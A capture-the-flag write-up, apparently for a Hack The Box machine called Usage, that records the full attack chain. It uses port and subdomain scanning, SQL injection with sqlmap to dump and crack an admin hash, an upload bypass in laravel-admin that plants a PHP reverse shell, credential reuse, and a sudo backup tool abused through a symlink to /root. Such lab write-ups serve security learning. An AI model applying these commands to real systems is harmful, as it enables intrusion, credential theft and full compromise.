TCP Scan

> TARGET=10.10.11.18 && nmap -p$(nmap -p- --min-rate=1000 -T4 $TARGET -Pn | grep ^[0-9] | cut -d '/' -f 1 | tr '\n' ',' | sed s/,$//) -sC -sV -Pn -vvv $TARGET -oN nmap_tcp_all.nmap

PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 63 OpenSSH 8.9p1 Ubuntu 3ubuntu0.6 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 63 nginx 1.18.0 (Ubuntu)
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Did not follow redirect to http://usage.htb/
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

# UDP scan
> nmap -p- --min-rate=1000 -T4 10.10.11.18 -Pn -sU -vvv -oN nmap_udp_all.nmap
[x]

Add 10.10.11.18 usage.htb to /etc/hosts

tcp/80

There is a url to admin.usage.htb
Register an account and login
cookie is named as laravel_session
headers

> curl -I http://usage.htb/
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
Cache-Control: no-cache, private
Date: Sun, 21 Apr 2024 22:37:22 GMT
Set-Cookie: XSRF-TOKEN=XSRF-TOKEN; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; samesite=lax
Set-Cookie: laravel_session=laravel_session; expires=Mon, 22 Apr 2024 00:37:22 GMT; Max-Age=7200; path=/; httponly; samesite=lax
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
X-Content-Type-Options: nosniff

dirsearch

> dirsearch -H "Cookie: XSRF-TOKEN=;laravel_session=cookie" -u http://usage.htb/ -x 503
[18:39:41] 403 -  564B  - /%2e%2e;/test
[18:39:58] 403 -  564B  - /admpar/.ftppass
[18:40:07] 200 -    6KB - /dashboard
[18:40:18] 403 -  564B  - /lib/flex/varien/.actionScriptProperties
[18:40:20] 302 -  334B  - /logout/  ->  http://usage.htb/login
[18:40:42] 403 -  564B  - /twitter/.env

> dirsearch -H "Cookie: laravel_session=cookie" -u http://usage.htb/ -x 503 -m POST
[18:16:16] 403 -  564B  - /%2e%2e;/test
[18:16:34] 403 -  564B  - /admrev/.ftppass
[18:16:54] 403 -  564B  - /lib/flex/varien/.flexLibProperties
[18:17:08] 405 -  568B  - /robots.txt

> dirsearch -H "Cookie: cookie" -u http://admin.usage.htb/ -x 503
[18:48:27] 403 -  564B  - /%2e%2e;/test
[18:48:49] 403 -  564B  - /bitrix/.settings
[18:49:05] 403 -  564B  - /lib/flex/varien/.flexLibProperties
[18:49:32] 403 -  564B  - /uploads/
[18:49:34] 403 -  564B  - /vendor/

subdomain

> wfuzz -w /usr/share/wordlists/SecLists/Discovery/DNS/subdomains-top1million-5000.txt -u "http://usage.htb/" -H "Host: FUZZ.usage.htb" --hh 178
000000024:   200        88 L     226 W      3304 Ch     "admin"

Try http://usage.htb/forget-password, found boolean injection

> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql

[19:48:37] [INFO] fetching tables for database: 'usage_blog'
[19:48:37] [INFO] fetching number of tables for database 'usage_blog'
[19:48:37] [INFO] retrieved: 15
[19:48:38] [INFO] retrieved: admin_menu
[19:48:55] [INFO] retrieved: admin_operation_log
[19:49:18] [INFO] retrieved: admin_permissions
[19:49:37] [INFO] retrieved: admin_role_menu
[19:49:55] [INFO] retrieved: admin_role_permissions
[19:50:16] [INFO] retrieved: admin_role_users
[19:50:28] [INFO] retrieved: admin_roles
[19:50:34] [INFO] retrieved: admin_user_permissions
[19:51:01] [INFO] retrieved: admin_users
[19:51:05] [INFO] retrieved: blog
[19:51:11] [INFO] retrieved: failed_jobs
[19:51:26] [INFO] retrieved: migrations
[19:51:39] [INFO] retrieved: password_reset_tokens
[19:52:11] [INFO] retrieved: personal_access_tokens
[19:52:43] [INFO] retrieved: users

> sqlmap -u http://usage.htb/forget-password -H "Cookie: cookies" --data '_token=<...>&email=test@test.com*' --level 5 --risk 3 --batch --dump --dbms mysql -T admin_users

Database: usage_blog
Table: admin_users
[1 entry]
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| id | name          | avatar  | password                                                     | username | created_at          | updated_at          | remember_token                                               |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+
| 1  | Administrator | <blank> | $2y$10$ohq2kLpBH/ri.P5wR0P3UOmc24Ydvl9DA9H1S6ooOMgH5xVfUPrL2 | admin    | 2023-08-13 02:48:26 | 2023-08-23 06:02:19 | kThXIKu7GhLpgwStz7fCFxjDomCYS1SmPpxwEkzv1Sdzva0qLYaDhllwrsLT |
+----+---------------+---------+--------------------------------------------------------------+----------+---------------------+---------------------+--------------------------------------------------------------+

Crack the hash using john

> john -w=/usr/share/wordlists/rockyou.txt hash
`whatever1`

http://admin.usage.htb/

Login to http://admin.usage.htb/ using the above credential
Found the following log entry, but not very useful $2y$10$E9.N1P92fYSjJGQDfBrUaO05EHW4BxiQITrqjde/WQMKnAQ7k2HJK:admin
Found encore/laravel-admin 1.8.18: https://flyd.uk/post/cve-2023-24249/
prepare a reverse shell: /usr/share/webshells/php/php-reverse-shell.php
rename it to a .jpg and upload, then intercept the traffic and change the extension to .php for the submit action.
browse to the uploaded file, for this case, it’s: http://admin.usage.htb/uploads/images/w.php to trigger the reverse shell

$ id
uid=1000(dash) gid=1000(dash) groups=1000(dash)
$ cat user.txt
0821865575c6b0dcfe188b2caec7fc8a

upload linpeas and run

[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#open-ports
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.53:53           0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:33060         0.0.0.0:*               LISTEN      -
tcp        0      0 0.0.0.0:80              0.0.0.0:*               LISTEN      1269/nginx: worker
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -
tcp        0      0 127.0.0.1:2812          0.0.0.0:*               LISTEN      1648/monit
tcp6       0      0 :::22                   :::*                    LISTEN      -

/home/dash/snap/lxd/common/config/config.yml
/home/dash/.monit.state
/home/dash/p.sh
/home/dash/.gnupg/crls.d/DIR.txt
/home/dash/.gnupg/pubring.kbx
/home/dash/.gnupg/trustdb.gpg
/home/dash/user.txt
/home/dash/.monit.pid

[+] Searching specific hashes inside files - less false positives (limit 70)
/var/www/html/project_admin/vendor/encore/laravel-admin/tests/seeds/factory.php:$2y$10$U2WSLymU6eKJclK06glaF.Gj3Sw/ieDE3n7mJYjKEgDh4nzUiSESO
/var/www/html/project_admin/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi
/var/www/html/usage_blog/database/factories/UserFactory.php:$2y$10$92IXUNpkjO0rOQ5byMi.Ye4oKoEa3Ro9llC/.og/at2.uheWG/igi

forward port 2812, there is a page that required basic auth

> ssh -L 2812:10.10.11.18:2812 -i dash_id_rsa dash@usage.htb

Found admin password to the forwarded page

dash@usage:~$ cat .monitrc
#Monitoring Interval in Seconds
set daemon  60

#Enable Web Access
set httpd port 2812
     use address 127.0.0.1
     allow admin:3nc0d3d_pa$$w0rd

#Apache
check process apache with pidfile "/var/run/apache2/apache2.pid"
    if cpu > 80% for 2 cycles then alert


#System Monitoring
check system usage
    if memory usage > 80% for 2 cycles then alert
    if cpu usage (user) > 70% for 2 cycles then alert
        if cpu usage (system) > 30% then alert
    if cpu usage (wait) > 20% then alert
    if loadavg (1min) > 6 for 2 cycles then alert
    if loadavg (5min) > 4 for 2 cycles then alert
    if swap usage > 5% then alert

check filesystem rootfs with path /
       if space usage > 80% then alert

there is another user called xander, use the same password to access it

> su xander

check sudo rights

xander@usage:/home/dash$ sudo -l
Matching Defaults entries for xander on usage:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin, use_pty

User xander may run the following commands on usage:
    (ALL : ALL) NOPASSWD: /usr/bin/usage_management

The binary can be used to backup project files in /var/www/html

xander@usage:~$ sudo /usr/bin/usage_management
Choose an option:
1. Project Backup
2. Backup MySQL data
3. Reset admin password
Enter your choice (1/2/3): 1

7-Zip (a) [64] 16.02 : Copyright (c) 1999-2016 Igor Pavlov : 2016-05-21
p7zip Version 16.02 (locale=en_US.UTF-8,Utf16=on,HugeFiles=on,64 bits,2 CPUs AMD EPYC 7413 24-Core Processor                 (A00F11),ASM,AES-NI)

Open archive: /var/backups/project.zip
--
Path = /var/backups/project.zip
Type = zip
Physical Size = 54874298

Scanning the drive:
3185 folders, 18035 files, 132313316 bytes (127 MiB)

Updating archive: /var/backups/project.zip

Items to compress: 21220


Files read from disk: 18035
Archive size: 72305397 bytes (69 MiB)
Everything is Ok

so, you can create a symlink to /root to backup the content

# as dash
> ln -s /root /var/www/html/rootfs

run the back up and then grab the zip file to find the root flag

2f70b84cf7e1d124052bc33950f1ca90

https://www.dotnetperls.com/7-zip-examples -snl : store symbolic links as links

dash_id_rsa

root_id_rsa

Support meowmeow

If you find this article useful, please support: https://www.buymeacoffee.com/meowmeowattack